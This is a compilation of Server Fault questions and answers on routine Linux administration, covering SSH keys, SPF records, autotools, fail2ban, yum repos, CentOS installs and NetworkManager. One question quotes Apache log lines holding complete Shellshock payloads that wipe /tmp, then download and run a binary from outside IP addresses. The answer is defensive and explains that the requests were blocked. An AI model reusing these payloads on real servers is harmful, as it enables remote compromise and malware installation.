SSH: Safe for client to host private RSA key?

user345807 asked:

Is it safe to generate a public/private key pair on the server, add the public key to the authorized_keys list, and then copy the private key to each client, as described here (http://www.rebol.com/docs/ssh-auto-login.html), assuming you maintain permanent control over each client (i.e., same user, many computers)?

The typical procedure is to generate the public/private key pair on the client, and then add the client’s public key to the authorized_keys list on the server, as described here (http://www.linuxproblem.org/art_9.html). With this method, if you have several client computers, each client’s public key must be concatenated to the authorized_keys list and maintained over time.


I answered:

Congratulations, you’ve found an Internet tutorial with bad advice.

The problem with using a single keypair for multiple computers occurs when any one of the computers is compromised. Then you have no choice but to revoke the keypair everywhere and rekey every single computer which was using that keypair. You should always use unique keypairs per machine and per user, to limit the damage that a compromised key can do.

As for that tutorial, it’s amazingly bad advice to generate the keypair on the server and copy the private key to the client. This is entirely backward. Instead, the keypair should be generated on the client and the public key copied to the server. There is even a helper script ssh-copy-id which does exactly this, and along the way makes sure all permissions are correct, the client gets the server’s host key, etc.
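As a sketch of the correct direction (the username and hostname below are placeholders):

```shell
# On the client: generate a keypair unique to this machine and user.
ssh-keygen -t rsa

# Copy only the *public* key into the server's authorized_keys,
# fixing up permissions and collecting the server's host key along the way.
ssh-copy-id user@bad.example.com
```

The private key never leaves the client, which is the whole point.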

There may indeed be situations where you want to centrally manage users’ identity keys, e.g. for automated scripts, but in this case you really should do this from a third host, or ideally from a configuration management system such as Puppet.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

OpenShift access via terminal (SSH) [Permission denied (publickey,gssapi-keyex,gssapi-with-mic).]

Karl Morrison asked:

I’m currently on Ubuntu and would like remote access to my application on OpenShift. I have done the following to create an ssh-rsa key (I’ve replaced the fingerprint with xx:xx…):

> mkdir ~/.ssh
> chmod 700 ~/.ssh
> ssh-keygen -t rsa                                      
Generating public/private rsa key pair.
Enter file in which to save the key (/home/karl/.ssh/id_rsa): openshiftKey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in openshiftKey.
Your public key has been saved in openshiftKey.pub.
The key fingerprint is:
xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx karl@karllaptop
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
... the rest of the image

This creates two files (notice they are not in ~/.ssh):

~/openshiftKey
~/openshiftKey.pub

I do not know where these files belong; the examples and tutorials say nothing about moving them.

I open the openshiftKey.pub and copy the code:

[screenshot]

I paste it into Openshift:

[screenshot]

Click save:

[screenshot]

Go back to the application settings page and copy the ssh link:

[screenshot]

And on my terminal try and connect:

[screenshot]

I’m sorry, as I am this new to ssh. What am I doing wrong?


I answered:

Here is a problem:

Enter file in which to save the key (/home/karl/.ssh/id_rsa): openshiftKey

You didn’t accept the default, and gave your key a specific filename.

If you had accepted the default, then ssh would automatically look in that default location (~/.ssh/id_rsa) whenever you make a remote connection to anywhere, and try to use that key.

In order to use a key other than the default key, you have to specify it explicitly when using ssh, for instance:

ssh -i $HOME/openshiftKey bad-example.rhcloud.com

But you’ll probably want to put the key into its default location, so that you can use the rhc command line tool to manage your gears. Trying to feed it ssh options is … rather hairy.
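Alternatively, an entry in $HOME/.ssh/config can bind the non-default key to the OpenShift hosts, so plain ssh (and tools that read ssh’s configuration) pick it up automatically. A sketch, with a placeholder host pattern:

```
Host *.rhcloud.com
    IdentityFile ~/openshiftKey
```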


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Does "~all" in the middle of an SPF record signal the end of the record when it is parsed?

whelanska asked:

Our company’s SPF record format is as follows:

“v=spf1 include:_spf.google.com ~all a mx ip4:X.X.0.0/23 include:spf.example.com ?all”

So we have an “~all” in the middle of our SPF record. On the openspf.org website, they say this regarding the “all” mechanism:

This mechanism always matches. It usually goes at the end of the SPF
record.

So, they don’t say “all” HAS to go at the end of the SPF record, but that it USUALLY goes at the end.

At our company, lately we’ve been seeing some soft fails in emails sent from servers listed in our SPF record, yet our SPF record passes all validation tools I’ve found so far.

What I’m wondering is, would this “~all” directly after the include for Google Apps (_spf.google.com) cause parsing to stop and not recognize the remaining pieces of the SPF record? Would passing vs. soft-failing depend on who is parsing it and their specific implementation of how they process SPF records? Is there any reason to have an “all” mechanism that is not at the end of an SPF record?

And yes, I know we could just change our SPF record. This question is more about clarifying how this all works and not necessarily about resolving our specific situation.


I answered:

RFC 7208 § 5.1 is explicit about this: once “all” appears, everything after it MUST be ignored.

Mechanisms after “all” will never be tested. Mechanisms listed after “all” MUST be ignored. Any “redirect” modifier (Section 6.1) MUST be ignored when there is an “all” mechanism in the record, regardless of the relative ordering of the terms.

The RFC it obsoleted, RFC 4408, said much the same thing; the newer version of the RFC simply clarifies the intention.

Mechanisms after “all” will never be tested. Any “redirect” modifier (Section 6.1) has no effect when there is an “all” mechanism.

So, conforming implementations of SPF will completely ignore everything after the first ~all. This doesn’t mean, however, that every implementation conforms to the spec.

It’s not at all clear why an online validation tool would not catch this misconfiguration, but if you intend for anything after the first all to be used, you should correct the record, as proper implementations will ignore it.
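For illustration only, using the mechanisms from the record in the question: keeping a single “all” at the very end leaves every mechanism reachable:

```
v=spf1 a mx ip4:X.X.0.0/23 include:_spf.google.com include:spf.example.com ~all
```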


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Installing Samplicator on CentOS

Eric asked:

I’m trying to install Samplicator to test a central NetFlow collector, forwarding from there to other collectors. I mainly want to use Samplicator because it can easily sample the NetFlow data and/or send on the full raw feed.

When I download it from the GitHub repo, there is no configure file by default, as the install instructions assume. I’ve tried using autoconf and various automake commands to get configure to appear, and it finally does, but then it says

config.status: error: cannot find input file: `Makefile.in'

Has anyone else had experience installing this software recently? I know it hasn’t been updated in quite a while.

Thanks,
Eric


I answered:

Projects built with GNU autotools usually include a bootstrap script that generates the configure script and its supporting files. These generated files aren’t checked into git, so you need to run the script to create them yourself.

Unfortunately this particular project includes no such script, so you’ll have to run the tools by hand. These need to be run, in order, to generate configure and its necessary friends:

aclocal
libtoolize
autoconf
automake

Depending on the program, they may also need various options passed to them. Contact the program author if you have trouble.
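With reasonably recent autotools, a single command usually drives all of the above in the correct order (a sketch; success still depends on the project’s configure.ac and Makefile.am being intact):

```shell
# Regenerate configure, Makefile.in, aclocal.m4, etc.
# --install copies in any missing auxiliary files (install-sh, depcomp, ...).
autoreconf --install
./configure
make
```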


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Loading fail2ban rules to iptables using iptables-persistent

Firze asked:

I am using the iptables-persistent package to reload my iptables rules on boot, and I have been wondering whether I should add the fail2ban rules to the loaded config file. Right now I am seeing that they are duplicated.

This is my firewall config:

*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:fail2ban-ssh - [0:0]

-A INPUT -p tcp -m multiport --dports 22 -j fail2ban-ssh

# Accepts SSH connection
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

# HTTP
-A INPUT -p tcp --dport 80 -j ACCEPT

# SSH
-A INPUT -p tcp --dport 22 -j ACCEPT

# MariaDB (private network)
-A INPUT -i eth1 -p tcp -m tcp --dport 3306 -j ACCEPT

# loopback device
-I INPUT 1 -i lo -j ACCEPT

# Allow ping
-A INPUT -p icmp -j ACCEPT

# Drops all remaining traffic
-A INPUT -j DROP

-A fail2ban-ssh -j RETURN

COMMIT

The fail2ban lines are duplicated when I reboot and run iptables -S:

-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-N fail2ban-ssh
-A INPUT -p tcp -m multiport --dports 22 -j fail2ban-ssh
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A INPUT -p tcp -m multiport --dports 22 -j fail2ban-ssh
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -j DROP
-A fail2ban-ssh -j RETURN
-A fail2ban-ssh -j RETURN

So should I remove those 2 fail2ban lines from my config?


I answered:

Don’t bother. fail2ban maintains its own state and will recreate its firewall rules when restarted.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Upgrading to PHP 5.6.7 using remi repos

AmadeusDrZaius asked:

I have php56 enabled in my remi.repo file and none of the other sections are enabled.

[remi-php56]
name=Les RPM de remi de PHP 5.6 pour Enterprise Linux 6 - $basearch
#baseurl=http://rpms.famillecollet.com/enterprise/6/php56/$basearch/
mirrorlist=http://rpms.famillecollet.com/enterprise/6/php56/mirror
# WARNING: If you enable this repository, you must also enable "remi"
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-remi

When I run yum install php, I get an error saying that my httpd-mmn version is wrong, but the version it requires is an old one. I find this very odd, because this process worked on the last server I updated.

Is this a bug in my version of remi.repo?


I answered:

As it told you specifically:

# WARNING: If you enable this repository, you must also enable "remi"
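In other words, the base remi repository must be enabled alongside remi-php56. As a sketch (section names as in the stock remi.repo file), you can enable it for a single transaction rather than permanently:

```shell
# Enable the base remi repo just for this install;
# remi-php56 is already enabled=1 in remi.repo.
yum --enablerepo=remi install php
```

Or set enabled=1 under the [remi] section of /etc/yum.repos.d/remi.repo to make it permanent.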

View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Should I worry about requests that get – client denied by server configuration, apache logs

dav asked:

I have a server with Debian 7. I was checking the Apache error log file and saw a few lines like this:

[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

I might be mistaken, but because of the () { :; }; part, I think someone was trying to exploit the Shellshock bug.

But independent of whether this is Shellshock or not, the question is: if I have lines in the logs with the message

client denied by server configuration

is this something I should worry about, or can I ignore it because the request was declined, being sure that no malicious scripts were downloaded or executed?


I answered:

“Client denied by server configuration” means that the request was blocked by a Require directive (or, in older versions of Apache, the Allow/Deny directives), by a rewrite rule, or by some other Apache module. In particular, it means the request was never passed on to an external handler, so the exploit never had a chance to run. The client was simply served an immediate 403 Forbidden error.
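For reference, this message is typically produced by access-control directives along these lines (a sketch; the directory path is taken from the logs above, and Debian 7 shipped Apache 2.2):

```apache
# Apache 2.2 style, as on Debian 7:
<Directory /home/username/www>
    Order allow,deny
    Deny from all
</Directory>

# The Apache 2.4 equivalent:
<Directory /home/username/www>
    Require all denied
</Directory>
```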


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

CentOS 7 installer: blank screen

the-wabbit asked:

I am trying to figure out CentOS 7 unattended network (PXE) installations in my setup, but the installer always ends up running into a black screen with no way to interact. This is being tried in a 64-bit VM (VMware Workstation or Oracle VirtualBox).

The installation seems to lift off normally: the kernel boots up, the initrd is loaded, and the startup scripts loading the kickstart file and the installer data from my repository server (via HTTP) have run more or less without errors:
[screenshot: first stage]

At this stage, attempts to download updates.img and product.img are reported as failing as they are not present in the repository I am using.

The install seems to proceed without errors:
[screenshot: installer loading]

up to the point where it is mentioning that GNOME has started:
[screenshot: GNOME started]

after which there is a screen mode switch and everything goes blank.

Things tried so far without success:

  • Console switch attempts using Ctrl+Alt+Fx do not work
  • Trying to kill X11 using Ctrl+Alt+Backspace does not produce any result
  • I also have tried the text and cmdline Kickstart installation options, as well as the nomodeset and text kernel parameters, to force a text mode install, as I suspected an X11 driver incompatibility
  • I have tried VMware Workstation as well as Oracle VirtualBox as the hypervisor for my VM – to no avail
  • I suspected a problem with my Kickstart script, at which point I ripped a sample one from here, replacing the --url= parameter’s data with http://ftp.tu-chemnitz.de/pub/linux/centos/7/os/x86_64/ (the installation mirror I want to use)
  • I have tried using another mirror which changed nothing except for the download time of the 278M-sized installer image (presumably LiveOS/squashfs.img)

What is going wrong here and how would I fix my install?


I answered:

What is this about GNOME Display Manager? That shouldn’t be present on installation-only media. The fact that it is present makes me think you mistakenly downloaded a live media image. Go back to your mirror and get the correct netinstall image.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Are there good reasons not to disable /etc/init.d/network on centos-7 in favor of exclusively using NetworkManager?

Ben asked:

rhel-7/centos-7 network configuration is bizarre — largely because they are straddling between the old (shell scripts usually invoked by /etc/init.d/network which mutate configuration state of network devices) and new way (NetworkManager daemon which manages network device settings).

To the best of my understanding, rhel7/centos-7 simultaneously support both configuration modes for network devices. They use a NetworkManager plugin called ifcfg-rh, which reads and writes network configuration in /etc/sysconfig/network-scripts/ifcfg-*. Configuration flows from these files into NetworkManager at startup, and changes made via NetworkManager (sometimes) get serialized back to these files through the ifcfg-rh plugin during system operation. This involves translations to and from the weird legacy configuration file format in /etc/sysconfig/network-scripts/ifcfg-* (a format originally interpreted by a pile of shell scripts). This situation scares me and makes me think about dragons.

My take is that straddling the two worlds is confusing and error prone — particularly if you have to automate network configuration changes for various reasons, and also when you have to educate co-workers about ‘new way’ of doing things on modern systems — people who might forget and cause configuration control to drift out of sync between the two worlds …

So, to avoid the potential for weird bugs, I want to just fully adopt NetworkManager and get rid of the legacy options. Should I expect side effects with the following approach:

> cat /etc/NetworkManager/NetworkManager.conf
[main]
plugin=keyfile

> cat /etc/NetworkManager/system-connections/dhcp-profile.conf
[connection]
id=dhcp
uuid=50263651-4f14-46bc-8dd8-818bf0fe3367
type=ethernet
autoconnect=true

[ipv6]
method=auto

[ipv4]
method=auto
> systemctl disable network
> systemctl enable NetworkManager

I think this should ensure the keyfile-formatted file is the source of truth for all NetworkManager settings, and should remove all behaviors which depend on the contents of
– /etc/sysconfig/network-scripts/*
– /etc/sysconfig/network
– /etc/init.d/network

It seems to work and behaves normally so far … I’m a little bit worried there might be side-effects from disabling the /etc/init.d/network ‘service’ … I don’t think there are any reasons why /etc/init.d/network should still be called in a fully NetworkManager world …?

Does anybody know of behaviors this would break or reasons this wouldn’t be a good idea?


I answered:

If you’re using NetworkManager, there is no reason to – and you should not – enable the legacy network service.

Conversely, if you’re using the legacy network service, you should not enable or start NetworkManager.

You might have breakage if you have legacy scripts that expect to use the old network service and don’t understand NetworkManager. These should be adapted as appropriate, if possible. Otherwise, you can always use the old network service.
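As a sketch (service names as they appear on CentOS 7), committing to one world or the other looks like this:

```shell
# Go all-in on NetworkManager:
systemctl disable network
systemctl enable NetworkManager
systemctl start NetworkManager

# Or, to stay with the legacy scripts instead:
# systemctl disable NetworkManager
# systemctl enable network
```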


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

How to get ssh to automatically use a certain port for a specific server?

Ghopper21 asked:

I use ssh to get into a specific server on a specific port as normal:

ssh -p <port_number> <server_name>

How do I configure ssh to automatically use the right port number for a specific server, so that I don’t have to enter the -p <port_number> parameter? Note that different servers I connect to will have different port numbers.


I answered:

Put it in your $HOME/.ssh/config file. For example:

Host bad.example.com
    Port 2222

Host *
    Port 22
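With that configuration in place, a plain invocation picks up the per-host port automatically (hostname from the example above):

```shell
# Equivalent to: ssh -p 2222 bad.example.com
ssh bad.example.com
```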

View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.